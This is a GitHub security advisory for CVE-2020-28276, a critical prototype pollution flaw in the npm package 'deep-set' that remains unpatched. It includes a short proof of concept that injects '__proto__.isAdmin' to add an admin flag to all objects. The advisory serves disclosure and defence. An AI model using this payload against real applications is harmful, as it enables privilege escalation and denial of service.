Skip to content

Prototype pollution vulnerability in 'deep-set'

Critical severity GitHub Reviewed Published May 24, 2022 to the GitHub Advisory Database • Updated Apr 22, 2024

Package

npm deep-set (npm)

Affected versions

>= 1.0.0, <= 1.0.1

Patched versions

None

Description

The NPM module 'deep-set' can be abused by Prototype Pollution vulnerability since the function deepSet() does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.

PoC

var deepSet = require('deep-set')
var obj = {'1':'2'}
console.log(obj.isAdmin);
deepSet(obj, '__proto__.isAdmin', 'true')
console.log(obj.isAdmin);

References

Published by the National Vulnerability Database Dec 29, 2020
Published to the GitHub Advisory Database May 24, 2022
Reviewed Apr 22, 2024
Last updated Apr 22, 2024

Severity

Critical
9.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2020-28276

GHSA ID

GHSA-wgxm-rg53-h2c6

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.